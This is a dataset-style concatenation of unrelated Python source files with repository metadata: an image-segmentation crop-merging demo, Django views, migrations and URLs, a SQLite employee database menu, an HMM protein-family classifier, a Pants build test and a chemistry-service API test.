cropped_all_floor_extended = np.ones(full_size)
cropped_all_floor_extended[crops_edges[i][1]:crops_edges[i][3], crops_edges[i][0]:crops_edges[i][2]] = cropped_all_floor
orig_glass = np.logical_and(cropped_all_optical_extended, orig_glass)
orig_mirror = np.logical_and(cropped_all_optical_extended, orig_mirror)
orig_OOS = np.logical_and(cropped_all_optical_extended, orig_OOS)
orig_floor = np.logical_and(cropped_all_floor_extended, orig_floor)
orig_FU = np.logical_and(cropped_all_floor_extended, orig_FU)
background = np.logical_or(orig_glass, orig_mirror)
background = np.logical_or(background, orig_OOS)
background = np.logical_or(background, orig_floor)
background = np.logical_or(background, orig_FU)
background = np.logical_not(background)
res = orig_glass * palette_glass
res += orig_mirror * palette_mirror
res += orig_OOS * palette_OOS
res += orig_floor * palette_floor
res += orig_FU * palette_FU
res += background * palette_BG
res_img = get_color_pallete(res, cfg.DATASET.NAME)
res_img = res_img.convert("RGB")
return res_img
#################################################################
####################### Using Or function #######################
#################################################################
elif function.lower() == "or":
# rospyLogInfoWrapper("Using And for merging cropped images")
orig_glass = crops_result[0]==palette_glass
orig_mirror = crops_result[0]==palette_mirror
orig_OOS = crops_result[0]==palette_OOS
orig_floor = crops_result[0]==palette_floor
orig_FU = crops_result[0]==palette_FU
# classes = [np.ones(full_size) for _ in range(max_clasess)]
# merged_classes = []
for i in range(1, len(crops_result)):
cropped_glass = crops_result[i]==palette_glass
cropped_mirror = crops_result[i]==palette_mirror
cropped_OOS = crops_result[i]==palette_OOS
cropped_floor = crops_result[i]==palette_floor
cropped_FU = crops_result[i]==palette_FU
# cropped_all_optical = np.logical_or(cropped_mirror, cropped_glass)
# cropped_all_optical = np.logical_or(cropped_all_optical, cropped_OOS)
# cropped_all_floor = np.logical_or(cropped_FU, cropped_floor)
cropped_glass_extended = np.zeros(full_size)
cropped_glass_extended[crops_edges[i][1]:crops_edges[i][3], crops_edges[i][0]:crops_edges[i][2]] = cropped_glass
cropped_mirror_extended = np.zeros(full_size)
cropped_mirror_extended[crops_edges[i][1]:crops_edges[i][3], crops_edges[i][0]:crops_edges[i][2]] = cropped_mirror
cropped_OOS_extended = np.zeros(full_size)
cropped_OOS_extended[crops_edges[i][1]:crops_edges[i][3], crops_edges[i][0]:crops_edges[i][2]] = cropped_OOS
cropped_floor_extended = np.zeros(full_size)
cropped_floor_extended[crops_edges[i][1]:crops_edges[i][3], crops_edges[i][0]:crops_edges[i][2]] = cropped_floor
cropped_FU_extended = np.ones(full_size)
cropped_FU_extended[crops_edges[i][1]:crops_edges[i][3], crops_edges[i][0]:crops_edges[i][2]] = cropped_FU
orig_glass = np.logical_or(cropped_glass_extended, orig_glass)
orig_free = np.logical_not(orig_glass)
orig_mirror = np.logical_and(np.logical_or(cropped_mirror_extended, orig_mirror), orig_free)
orig_free = np.logical_and(orig_free, np.logical_not(orig_mirror))
orig_OOS = np.logical_and(np.logical_or(cropped_OOS_extended, orig_OOS), orig_free)
orig_free = np.logical_and(orig_free, np.logical_not(orig_OOS))
orig_floor = np.logical_and(np.logical_or(cropped_floor_extended, orig_floor), orig_free)
orig_FU = np.logical_and(cropped_FU_extended, orig_FU)
background = np.logical_or(orig_glass, orig_mirror)
background = np.logical_or(background, orig_OOS)
background = np.logical_or(background, orig_floor)
background = np.logical_or(background, orig_FU)
background = np.logical_not(background)
res = orig_glass * palette_glass
res += orig_mirror * palette_mirror
res += orig_OOS * palette_OOS
res += orig_floor * palette_floor
res += orig_FU * palette_FU
res += background * palette_BG
res_img = get_color_pallete(res, cfg.DATASET.NAME)
res_img = res_img.convert("RGB")
return res_img
#################################################################
#################### Using confidence values# ###################
#################################################################
elif function.lower() == "confidence":
confidence_extended_all = [crops_confidence[0]]
results_extended_all = [crops_result[0]]
for i in range(1, len(crops_confidence)):
cropped_confidence_extended = np.zeros(full_size)
cropped_confidence_extended[crops_edges[i][1]:crops_edges[i][3], crops_edges[i][0]:crops_edges[i][2]] = crops_confidence[i]
confidence_extended_all.append(cropped_confidence_extended)
cropped_segmentation_extended = np.zeros(full_size)
cropped_segmentation_extended[crops_edges[i][1]:crops_edges[i][3], crops_edges[i][0]:crops_edges[i][2]] = crops_result[i]
results_extended_all.append(cropped_segmentation_extended)
max_confidence_args = np.argsort(confidence_extended_all, axis=0)
result_sorted_confidence = np.take_along_axis(np.array(results_extended_all), max_confidence_args, axis=0)
res = result_sorted_confidence[-1]
# rospyLogInfoWrapper("result_max_confidence shape"+str(result_sorted_confidence.shape))
# rospyLogInfoWrapper("result_max_confidence[0][1]"+str(max_confidence_args[0][0][0:4]))
# rospyLogInfoWrapper("result_max_confidence[0][2]"+str(max_confidence_args[2][0][0:4]))
res_img = get_color_pallete(res, cfg.DATASET.NAME)
res_img = res_img.convert("RGB")
return res_img
if __name__ == '__main__':
demo()
| GhadeerElmkaiel/Trans2Seg | tools/demo.py | demo.py | py | 13,641 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "os.path.abspath",
"line_number": 7,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 7,
"usage_type": "attribute"
},
{
"api_name": "os.path.dirname",
"line_number": 7,
"usage_type": "call"
},
{
"api_name": "os.path.split",
"line_n... |
41537740788 | # -*- coding: utf-8 -*-
# @Time : 2018/4/19 9:43
# @Author : Narata
# @Project : demo
# @File : view.py
# @Software : PyCharm
from django.shortcuts import render
from django.http import HttpResponse
def add(request):
a = request.GET['a']
b = request.GET['b']
callback = request.GET['callback']
_ = request.GET['_']
result = "{}({})".format(callback, str({'result': int(a)+int(b)}))
return HttpResponse(result) | narata/demo | ajax/view.py | view.py | py | 447 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "django.http.HttpResponse",
"line_number": 18,
"usage_type": "call"
}
] |
22166964803 | import sqlite3
import pandas as pd
# Define DBOperation class to manage all data into the database.
# Give a name of your choice to the database
class DBOperations:
sql_create_table_firsttime = "CREATE TABLE IF NOT EXISTS employee (" \
"employee_id INTEGER PRIMARY KEY AUTOINCREMENT," \
"Title VARCHAR(4) NOT NULL, " \
"Forename VARCHAR(20) NOT NULL, " \
"Surname VARCHAR(20) NOT NULL, " \
"EmailAddress VARCHAR (255) NOT NULL, " \
"Salary FLOAT(20) NOT NULL" \
")"
sql_create_table = "CREATE TABLE IF NOT EXISTS employee (" \
"employee_id INTEGER PRIMARY KEY AUTOINCREMENT," \
"Title VARCHAR(4) NOT NULL, " \
"Forename VARCHAR(20) NOT NULL, " \
"Surname VARCHAR(20) NOT NULL, " \
"EmailAddress VARCHAR (255) NOT NULL, " \
"Salary FLOAT(20) NOT NULL" \
")"
sql_check_table_exists = "SELECT COUNT(*) " \
"FROM sqlite_master " \
"WHERE name = 'employee'"
sql_insert = "INSERT INTO employee (Title, Forename, Surname, EmailAddress, Salary)" \
"VALUES(?, ?, ?, ?, ?);"
sql_select_all = "SELECT * FROM employee"
sql_search = "SELECT * " \
"FROM employee " \
"WHERE employee_id = ?;"
sql_update_data = "UPDATE employee SET Title=?, Forename=?, Surname=?, EmailAddress=?, Salary=? WHERE employee_id=?"
sql_delete_data = "DELETE FROM employee WHERE employee_id=?"
sql_drop_table = "DROP TABLE employee"
def __init__(self):
try:
self.conn = sqlite3.connect("abcDB")
self.cur = self.conn.cursor()
# self.cur.execute(self.sql_create_table_firsttime)
self.conn.commit()
except Exception as e:
print(e)
finally:
self.conn.close()
def get_connection(self):
self.conn = sqlite3.connect("abcDB")
self.cur = self.conn.cursor()
def create_table(self):
try:
self.get_connection()
self.cur.execute(self.sql_check_table_exists)
if self.cur.fetchone()[0] == 1:
print("Table employee already exists")
else:
self.cur.execute(self.sql_create_table)
self.conn.commit()
print("Table created successfully")
except Exception as e:
print(e)
finally:
self.conn.close()
def drop_table(self):
try:
self.get_connection()
self.cur.execute(self.sql_drop_table)
self.conn.commit()
print("Table dropped")
except Exception as e:
print(e)
finally:
self.conn.close()
def insert_data(self):
try:
self.get_connection()
emp = Employee()
emp.set_employee_title(str(input("Enter Employee Title: ")))
emp.set_forename(str(input("Enter Employee Forename: ")))
emp.set_surname(str(input("Enter Employee Surname: ")))
emp.set_email(str(input("Enter Employee Email: ")))
emp.set_salary(float(input("Enter Employee Salary: ")))
self.cur.execute(self.sql_insert, tuple(str(emp).split("\n")))
self.conn.commit()
print("Inserted data successfully")
except Exception as e:
print(e)
finally:
self.conn.close()
def select_all(self):
try:
self.get_connection()
data = pd.read_sql_query(self.sql_select_all, self.conn)
if data.empty:
print('Table employee is empty!')
else:
print(data.to_string(index=False))
# think how you could develop this method to show the records
except Exception as e:
print(e)
finally:
self.conn.close()
def search_data(self):
try:
self.get_connection()
employee_id = int(input("Enter Employee ID: "))
self.cur.execute(self.sql_search, tuple(str(employee_id)))
result = self.cur.fetchone()
if type(result) == type(tuple()):
for index, detail in enumerate(result):
if index == 0:
print("Employee ID: " + str(detail))
elif index == 1:
print("Employee Title: " + detail)
elif index == 2:
print("Employee Name: " + detail)
elif index == 3:
print("Employee Surname: " + detail)
elif index == 4:
print("Employee Email: " + detail)
else:
print("Salary: " + str(detail))
else:
print("No Record")
except Exception as e:
print(e)
finally:
self.conn.close()
def update_data(self):
try:
self.get_connection()
# Update statement
employee_id = int(input("Enter Employee ID: "))
emp_title = str(input("Enter Employee's New Title: "))
forename = str(input("Enter Employee's New Forename: "))
surname = str(input("Enter Employee's New Surname: "))
email_address = str(input("Enter Employee's New Email Address: "))
salary = str(input("Enter Employee's New Salary: "))
result = self.cur.execute(self.sql_update_data,
[(str(emp_title)), (str(forename)), (str(surname)), (str(email_address)),
(float(salary)), (str(employee_id)), ])
if result.rowcount != 0:
self.conn.commit()
print(str(result.rowcount) + "Row(s) affected.")
else:
print("Cannot find this record in the database")
except Exception as e:
print(e)
finally:
self.conn.close()
# Define Delete_data method to delete data from the table.
# The user will need to input the employee id to delete the corrosponding record.
def delete_data(self):
try:
self.get_connection()
employee_id = int(input("Enter Employee ID: "))
result = self.cur.execute(self.sql_delete_data, [str(employee_id, )])
if result.rowcount != 0:
self.conn.commit()
print(str(result.rowcount) + "Row(s) affected.")
else:
print("Cannot find this record in the database")
except Exception as e:
print(e)
finally:
self.conn.close()
class Employee:
def __init__(self):
self.employee_id = 0
self.empTitle = ''
self.forename = ''
self.surname = ''
self.email = ''
self.salary = 0.0
def set_employee_id(self, employee_id):
self.employee_id = employee_id
def set_employee_title(self, emp_title):
self.empTitle = emp_title
def set_forename(self, forename):
self.forename = forename
def set_surname(self, surname):
self.surname = surname
def set_email(self, email):
self.email = email
def set_salary(self, salary):
self.salary = salary
def get_employee_id(self):
return self.employee_id
def get_employee_title(self):
return self.empTitle
def get_forename(self):
return self.forename
def get_surname(self):
return self.surname
def get_email(self):
return self.email
def get_salary(self):
return self.salary
def __str__(self):
return self.empTitle + "\n" + self.forename + "\n" + self.surname + "\n" + self.email + "\n" + str(self.salary)
# The main function will parse arguments.
# These argument will be defined by the users on the console.
# The user will select a choice from the menu to interact with the database.
while True:
print("\n Menu:")
print("****************************************")
print(" 1. Create table EmployeeUoB")
print(" 2. Insert data into EmployeeUoB")
print(" 3. Select all data into EmployeeUoB")
print(" 4. Search an employee")
print(" 5. Update data some records")
print(" 6. Delete data some records")
print(" 7. Drop table Employee")
print(" 8. Exit\n")
__choose_menu = int(input("Enter your choice: "))
db_ops = DBOperations()
if __choose_menu == 1:
db_ops.create_table()
elif __choose_menu == 2:
db_ops.insert_data()
elif __choose_menu == 3:
db_ops.select_all()
elif __choose_menu == 4:
db_ops.search_data()
elif __choose_menu == 5:
db_ops.update_data()
elif __choose_menu == 6:
db_ops.delete_data()
elif __choose_menu == 7:
db_ops.drop_table()
elif __choose_menu == 8:
exit(0)
else:
print("Invalid Choice")
| SvetA95/DatabasesAndCloud_Assignment3 | lab3.py | lab3.py | py | 9,339 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "sqlite3.connect",
"line_number": 41,
"usage_type": "call"
},
{
"api_name": "sqlite3.connect",
"line_number": 51,
"usage_type": "call"
},
{
"api_name": "pandas.read_sql_query",
"line_number": 102,
"usage_type": "call"
}
] |
38941944677 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
import datetime
from django.utils.timezone import utc
class Migration(migrations.Migration):
dependencies = [
('shifts_app', '0010_auto_20171130_2233'),
]
operations = [
migrations.RemoveField(
model_name='shift',
name='shiftGroup',
),
migrations.AlterField(
model_name='shift',
name='end_datetime',
field=models.DateTimeField(default=datetime.datetime(2017, 12, 1, 22, 40, 31, 52072, tzinfo=utc)),
),
migrations.AlterField(
model_name='shift',
name='start_datetime',
field=models.DateTimeField(default=datetime.datetime(2017, 12, 1, 22, 40, 31, 52011, tzinfo=utc)),
),
migrations.DeleteModel(
name='ShiftGroup',
),
]
| ssrahman34/Employee-Shifts-Project | shift_project/shifts_app/migrations/0011_auto_20171201_2240.py | 0011_auto_20171201_2240.py | py | 924 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "django.db.migrations.Migration",
"line_number": 9,
"usage_type": "attribute"
},
{
"api_name": "django.db.migrations",
"line_number": 9,
"usage_type": "name"
},
{
"api_name": "django.db.migrations.RemoveField",
"line_number": 16,
"usage_type": "call"
},
... |
21695020276 | """mtgrecorder URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.9/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.conf.urls import url, include
2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))
"""
from django.conf.urls import url, include
from django.contrib import admin
urlpatterns = [
url(r'^tournamentHost/', include('tournamentHost.urls')),
url(r'^admin/', admin.site.urls),
# Auth-related URLs:
url(r'^login/$', 'django.contrib.auth.views.login', name='login'),
url(r'^logout/$', 'django.contrib.auth.views.logout', name='logout'),
#url(r'^loggedin/$', 'mtgrecorder.views.loggedin', name='loggedin'),
# Registration URLs
url(r'^register/$', 'mtgrecorder.views.register', name='register'),
url(r'^register/complete/$', 'mtgrecorder.views.registration_complete', name='registration_complete'),
url(r'^welcome/', 'mtgrecorder.views.welcome', name='welcome'),
url(r'^request/', 'mtgrecorder.views.request_verification', name='request_verification'),
url(r'^tournament/add/', 'mtgrecorder.views.add_tournament', name='add_tournament'),
#url(r'^verify_request/', 'mtgrecorder.views.verify_request', name='verify_request'),
url(r'^profile/([A-Za-z0-9\.\_\-]+)', 'mtgrecorder.views.profile', name='profile'),
#url(r'', 'mtgrecorder.views.welcome', name='welcome'),
url(r'^match/(\d+)$', 'mtgrecorder.views.confirm_match', name='confirm_match'),
# Below should be all confirmed match results...
#url(r'^answer/$', 'app.views.xxx_test1', name='newAnswer '),
]
| edasaur/mtg-recorder | mtgrecorder/urls.py | urls.py | py | 1,981 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "django.conf.urls.url",
"line_number": 20,
"usage_type": "call"
},
{
"api_name": "django.conf.urls.include",
"line_number": 20,
"usage_type": "call"
},
{
"api_name": "django.conf.urls.url",
"line_number": 21,
"usage_type": "call"
},
{
"api_name": "dj... |
74788588584 | import itertools
from day07.day7_lib import calc_amp, calc_amp_with_feedback
from util import get_program
if __name__ == "__main__":
p = get_program("inputs/day7.txt")
all_possible_phase_settings = itertools.permutations(range(5))
a_max, max_config = max(
((calc_amp(p, phase_config), phase_config) for phase_config in all_possible_phase_settings),
key=lambda s: s[0])
print(f"The maximal amplitude that 5 amps can give is: {a_max}") # 77500
amplification_and_settings = (
(calc_amp_with_feedback(p, phase_config), phase_config)
for phase_config in
itertools.permutations(range(5, 10))
)
a_max, max_config = max(amplification_and_settings, key=lambda s: s[0])
print(f"With feedback the max becomes {a_max}") # 22476942
| el-hult/adventofcode2019 | day07/day7_runner.py | day7_runner.py | py | 797 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "util.get_program",
"line_number": 7,
"usage_type": "call"
},
{
"api_name": "itertools.permutations",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "day07.day7_lib.calc_amp",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "day07.d... |
18953334688 | import numpy as np
from collections import Counter
import pandas as pd
from math import log10
import matplotlib.pyplot as plt
from HMM_errors import *
class SequenceReader:
"""
This class builds HMM from protein or DNA sequence alignment.
"""
def __init__(self, path_to_file, amino_acids=True, deletion_sign="-"):
alignment_list = []
with open(path_to_file) as seq_file:
for line in seq_file:
alignment_list.append(list(line.strip()))
if not alignment_list:
raise EmptyFile("File {} is empty!".format(path_to_file))
self.alignment_list = alignment_list
self.alignment_len = len(alignment_list)
self.position_list = SequenceReader.transpose(alignment_list)
self.position_len = len(self.position_list)
self.deletion_sign = deletion_sign
self.alignment_alphabet = (
"A", "R", "N", "D", "C", "E", "Q", "G", "H", "I", "L", "K", "M", "F", "P", "S", "T", "W", "Y",
"V") if amino_acids else ("A", "C", "G", "T")
self.amino_acids = amino_acids
self.true_seq, self.match_emission, self.insert_emission = self.calculate_emissions()
self.match_emission = pd.DataFrame(SequenceReader.transpose(self.match_emission))
self.match_emission.index = self.alignment_alphabet
self.insert_emission = pd.DataFrame(SequenceReader.transpose(self.insert_emission))
self.insert_emission.index = self.alignment_alphabet
self.L = len(self.true_seq)
self.trans = self.calculate_transitions()
def calculate_transitions(self):
match_transition = {"M": [0] * (self.L + 1), "D": [0] * (self.L + 1), "I": [0] * (self.L + 1)}
insert_transition = {"M": [0] * (self.L + 1), "D": [0] * (self.L + 1), "I": [0] * (self.L + 1)}
# delete_transition = {"M": [float('nan')] + ([0] * self.L), "D": [float('nan')] + ([0] * self.L),
# "I": [float('nan')] + ([0] * self.L)}
delete_transition = {"M": [float(0)] + ([0] * self.L), "D": [float(0)] + ([0] * self.L),
"I": [float(0)] + ([0] * self.L)}
trans = {"M": match_transition, "D": delete_transition, "I": insert_transition}
for alignment_i, sequence in enumerate(self.alignment_list):
last_seq_position = 0
first_transition_index = "M"
for true_seq_i, x in enumerate(self.true_seq):
self.process_transitions(sequence, trans, last_seq_position, x, true_seq_i, first_transition_index)
first_transition_index = "D" if sequence[x] == self.deletion_sign else "M"
last_seq_position = x + 1
else:
if last_seq_position != 0:
true_seq_i += 1
self.process_transitions(sequence, trans, last_seq_position, len(sequence), true_seq_i,
first_transition_index)
return SequenceReader.divide_dict(trans)
def process_insertion(self, insertion, insert_transition, sequence_sign, true_seq_i):
last_transition_index = "D" if sequence_sign == self.deletion_sign else "M"
if insertion:
insert_transition["I"][true_seq_i] += len(insertion) - 1
insert_transition[last_transition_index][true_seq_i] += 1
last_transition_index = "I"
return last_transition_index
def process_transitions(self, sequence, trans, last_seq_position, x, true_seq_i, first_transition_index):
insertion = SequenceReader.clear_list(sequence[last_seq_position:x])
sign_in_sequence = sequence[x] if x < len(sequence) else True
last_transition_index = self.process_insertion(insertion, trans["I"], sign_in_sequence, true_seq_i)
trans[first_transition_index][last_transition_index][true_seq_i] += 1
def calculate_emissions(self, deletion_sign="-", treshold=0.5):
true_seq = []
match_emission = []
insert_emission = []
full_occurrence_count = {}
for i, position_i in enumerate(self.position_list):
current_occurrence_count = Counter(position_i) # UPDATE HERE!
deletion_count = current_occurrence_count.get(deletion_sign, 0)
if deletion_count / self.alignment_len < treshold:
match_emission.append(SequenceReader.divide_list(self.build_count_column(current_occurrence_count)))
insert_emission.append(SequenceReader.divide_list(self.build_count_column(full_occurrence_count)))
true_seq.append(i)
full_occurrence_count = {}
else:
full_occurrence_count = Counter(full_occurrence_count) + Counter(current_occurrence_count)
else:
insert_emission.append(SequenceReader.divide_list(self.build_count_column(full_occurrence_count)))
# match_emission.insert(0,[float("NaN")]*len(self.alignment_alphabet))
match_emission.insert(0, [float(0)] * len(self.alignment_alphabet))
return true_seq, match_emission, insert_emission
def build_count_column(self, occurrence_count):
match_column = []
for letter in self.alignment_alphabet:
match_column.append(occurrence_count.get(letter, 0))
return match_column
def forward(self, sequence):
FM = np.zeros(shape=(len(sequence) + 1, self.L + 1), dtype=np.float64)
FI = np.zeros(shape=(len(sequence) + 1, self.L + 1), dtype=np.float64)
FD = np.zeros(shape=(len(sequence) + 1, self.L + 1), dtype=np.float64)
# row_len = seqeunce len = i
# column_len = model len = j
FI[0, 0] = np.log(self.insert_emission.loc[sequence[0]][0])
# FM[1, 1] = np.log(self.match_emission.loc[sequence[1]][1]) + np.log(
# self.trans["M"]["M"][0] * np.exp(FM[0, 0]) + self.trans["I"]["M"][0] * np.exp(FI[0, 0])
# )
#
# FI[1, 1] = np.log(self.insert_emission.loc[sequence[1]][1]) + np.log(
# self.trans["M"]["I"][0] * np.exp(FM[0, 1]) + self.trans["I"]["I"][0] * np.exp(FI[0, 1])
# )
#
# FD[1, 1] = np.log(self.trans["M"]["D"][0] * np.exp(FM[1, 0]) + self.trans["I"]["D"][0] * np.exp(FI[1, 0]))
for i, sign in enumerate(sequence):
i += 1
for j in range(1, self.L + 1):
FM[i, j] = np.log(self.match_emission.loc[sign][j] / (1 / len(self.alignment_alphabet))) + np.log(
(self.trans["M"]["M"][j - 1] * np.exp(FM[i - 1][j - 1])) +
(self.trans["I"]["M"][j - 1] * np.exp(FI[i - 1][j - 1])) +
(self.trans["D"]["M"][j - 1] * np.exp(FD[i - 1][j - 1]))
)
FI[i, j] = np.log(self.insert_emission.loc[sign][j] / (1 / len(self.alignment_alphabet))) + np.log(
(self.trans["M"]["I"][j - 1] * np.exp(FM[i - 1][j])) +
(self.trans["I"]["I"][j - 1] * np.exp(FI[i - 1][j])) +
(self.trans["D"]["I"][j - 1] * np.exp(FD[i - 1][j]))
)
FD[i, j] = np.log(
(self.trans["M"]["D"][j - 1] * np.exp(FM[i][j - 1])) +
(self.trans["I"]["D"][j - 1] * np.exp(FI[i][j - 1])) +
(self.trans["D"]["D"][j - 1] * np.exp(FD[i][j - 1]))
)
return FM[i][j]
@staticmethod
def compare(sequence, HMM_model_1, HMM_model_2=False):
if not HMM_model_2:
HMM_model_2 = SequenceReader.random_model(HMM_model_1.position_len, HMM_model_1.alignment_len,
HMM_model_1.amino_acids, HMM_model_1.deletion_sign)
return log10(HMM_model_1.forward(sequence) / HMM_model_2.forward(sequence))
@staticmethod
def pairwise(iterable):
"s -> (s0,s1), (s1,s2), (s2, s3), ..."
from itertools import tee
a, b = tee(iterable)
next(b, None)
return zip(a, b)
@staticmethod
def transpose(iterable):
return list(map(list, zip(*iterable)))
@staticmethod
def clear_list(list_to_clear, element_to_delete="-"):
return [x for x in list_to_clear if x != element_to_delete]
@staticmethod
def divide_list(list_to_divide):
list_to_divide = [x + 1 for x in list_to_divide]
list_sum = sum(list_to_divide)
return [x / list_sum for x in list_to_divide]
@staticmethod
def divide_dict(dict_to_divide):
for first, second in dict_to_divide.items():
fraction = [sum(x) + 1 * 3 for x in zip(*second.values())]
for key_of_list, list_to_divide in second.items():
list_to_divide = [(x + 1) / y for x, y in zip(list_to_divide, fraction)]
dict_to_divide[first][key_of_list] = list_to_divide
return dict_to_divide
def plot_matrix(title, data):
fig = plt.figure(figsize=(10, 6))
plt.plot(data, linestyle="", marker="o")
plt.title(title)
fig = plt.gcf()
fig.savefig('plots/{}.png'.format(title.replace(" ", "_")))
plt.show()
def plot_model(model, name, position):
print("{} model len: {}".format(name, model.L))
print("{} T, mE, iE shapes: {},{},{}".format(name, (9, len(model.trans["M"]["M"])), model.match_emission.shape,
model.insert_emission.shape))
print("----------Position {} of {} HMM model.------------".format(position, name))
plot_matrix("Position {} of {} HMM model: Match emission".format(position, name),
model.match_emission.loc[:, position])
plot_matrix("Position {} of {} HMM model: Insert emission".format(position, name),
model.insert_emission.loc[:, position])
trans_table = []
trans_names = []
for x1, y1 in model.trans.items():
for x2, y2 in y1.items():
print("{}-{}: {}".format(x1, x2, y2[50]))
trans_table.append([y2[50]])
trans_names.append("{}-{}".format(x1, x2))
trans_df = pd.DataFrame(trans_table,index=trans_names)
print(trans_df)
plot_matrix("Position {} of {} HMM model: Transitions".format(position, name), trans_df)
def main():
atp = SequenceReader("ATPases.txt")
gtp = SequenceReader("GTP_binding_proteins.txt")
for position in [49, 50]:
for model, name in [(atp, "ATPases"), (gtp, "GTP binding proteins")]:
plot_model(model, name, position)
y = []
with open("Unclassified_proteins.txt") as file:
for line in file:
atp_score = atp.forward(line.strip())
gtp_score = gtp.forward(line.strip())
print()
print(line.strip())
print("ATP score: {}".format(atp_score))
print("GTP score: {}".format(gtp_score))
y.append(atp_score - gtp_score)
fig = plt.figure(figsize=(10, 6))
y_plus = [x if x >= 0 else 0 for x in y]
y_minus = [x if x < 0 else 0 for x in y]
x = [x for x in range(len(y))]
plt.bar(x, y, tick_label=x, width=0.5)
fig = plt.figure(figsize=(10, 6))
ax = fig.add_subplot(111)
ax.bar(x, y_minus, tick_label=x, width=0.5, color='r', label='GTP binding proteins')
ax.bar(x, y_plus, tick_label=x, width=0.5, color='b', label='ATPases')
plt.title('Family membership')
ax.legend()
plt.show()
if __name__ == "__main__":
main()
| Kronossos/SAD2_project_2 | SequenceReader.py | SequenceReader.py | py | 11,452 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "pandas.DataFrame",
"line_number": 43,
"usage_type": "call"
},
{
"api_name": "pandas.DataFrame",
"line_number": 45,
"usage_type": "call"
},
{
"api_name": "collections.Counter",
"line_number": 101,
"usage_type": "call"
},
{
"api_name": "collections.Co... |
17797113504 | from __future__ import absolute_import, division, print_function, unicode_literals
import os
from pants.base.build_environment import get_buildroot
from pants_test.backend.python.pants_requirement_integration_test_base import \
PantsRequirementIntegrationTestBase
class PantsRequirementIntegrationTest(PantsRequirementIntegrationTestBase):
"""A pants plugin should be able to depend on a pants_requirement() alone to
declare its dependencies on pants modules. This plugin, when added to the
pythonpath and backend_packages, should be able to declare new BUILD file
objects."""
@classmethod
def use_pantsd_env_var(cls):
"""The test fails to run under pantsd because of a failure to initialize a subsystem"""
return False
def run_with_testproject_backend_pkgs(self, cmd):
testproject_backend_src_dir = os.path.join(
get_buildroot(), 'testprojects/pants-plugins/src/python')
testproject_backend_pkg_name = 'test_pants_plugin'
pants_req_addr = 'testprojects/pants-plugins/3rdparty/python/pants'
pants_test_infra_addr = 'tests/python/pants_test:test_infra'
pre_cmd_args = [
"--pythonpath=+['{}']".format(testproject_backend_src_dir),
"--backend-packages=+['{}']".format(testproject_backend_pkg_name),
"--pants-test-infra-pants-requirement-target={}".format(pants_req_addr),
"--pants-test-infra-pants-test-infra-target={}".format(pants_test_infra_addr),
]
command = pre_cmd_args + cmd
return self.run_pants(command=command)
def test_pants_requirement(self):
self.maxDiff = None
with self.create_unstable_pants_distribution() as repo:
tests_dir = 'testprojects/pants-plugins/tests/python/test_pants_plugin'
with self.file_renamed(os.path.join(get_buildroot(), tests_dir), 'TEST_BUILD', 'BUILD'):
test_pants_requirement_cmd = ['--python-repos-repos={}'.format(repo),
'test',
tests_dir]
pants_run = self.run_with_testproject_backend_pkgs(test_pants_requirement_cmd)
self.assert_success(pants_run)
| fakeNetflix/twitter-repo-pants | tests/python/pants_test/backend/python/test_pants_requirement_integration.py | test_pants_requirement_integration.py | py | 2,104 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "pants_test.backend.python.pants_requirement_integration_test_base.PantsRequirementIntegrationTestBase",
"line_number": 10,
"usage_type": "name"
},
{
"api_name": "os.path.join",
"line_number": 22,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 2... |
28370505452 | import itertools
import os
import pathlib
from typing import List
import pytest
from fastapi.testclient import TestClient
from indigo_service import jsonapi
from indigo_service.indigo_http import app
client = TestClient(app)
test_structures = [
{"structure": "CNC", "format": "auto"},
{"structure": "CN1C=NC2=C1C(=O)N(C(=O)N2C)C", "format": "auto"},
{
"structure": "InChI=1S/C8H10N4O2/c1-10-4-9-6-5(10)"
"7(13)12(3)8(14)11(6)2/h4H,1-3H3",
"format": "auto",
},
]
# Convert
@pytest.mark.parametrize(
"test_input,target,modifiers,expected",
[
(["CNC", "inchi", [], "InChI=1S/C2H7N/c1-3-2/h3H,1-2H3"]),
(["InChI=1S/C2H7N/c1-3-2/h3H,1-2H3", "smiles", [], "CNC"]),
(
[
"InChI=1S/C8Cl2N2O2/c9-5-6(10)8(14)4(2-12)3(1-11)7(5)13",
"inchi",
["aromatize", "clean2d"],
"InChI=1S/C8Cl2N2O2/c9-5-6(10)8(14)4(2-12)3(1-11)7(5)13",
]
),
(["C1=CC=CC=C1", "smiles", ["aromatize"], "c1ccccc1"]),
],
)
def test_convert(
test_input: str, target: str, modifiers: List[str], expected: str
) -> None:
response = client.post(
"/indigo/convert",
json={
"data": {
"type": "convert",
"attributes": {
"compound": {
"structure": test_input,
"format": "auto",
"modifiers": modifiers,
},
"outputFormat": target,
},
}
},
)
assert response.status_code == 200
assert response.json()["data"]["attributes"]["structure"] == expected
assert response.json()["data"]["attributes"]["format"] == target
def test_ket_convert() -> None:
resources = "tests/test_resources/kets"
*_, files = next(os.walk(resources))
for file_ in files:
# pylint: disable=unspecified-encoding
with open(pathlib.Path(resources) / file_):
smiles = pathlib.Path(file_).stem
# ket = json.loads(f.read())
response = client.post(
"/indigo/convert",
json={
"data": {
"type": "convert",
"attributes": {
"compound": {
"structure": smiles,
"format": "auto",
"modifiers": [],
},
"outputFormat": "ket",
},
}
},
)
assert response.status_code == 200
# Similarities
def similarity_request( # pylint: disable=too-many-arguments
source: dict,
targets: list[dict],
fingerprint: str = "sim",
metric: str = "tanimoto",
alpha: float = 0.5,
beta: float = 0.5,
) -> dict:
return {
"data": {
"type": "similarities",
"attributes": {
"source": source,
"targets": targets,
"fingerprint": fingerprint,
"metric": metric,
"alpha": alpha,
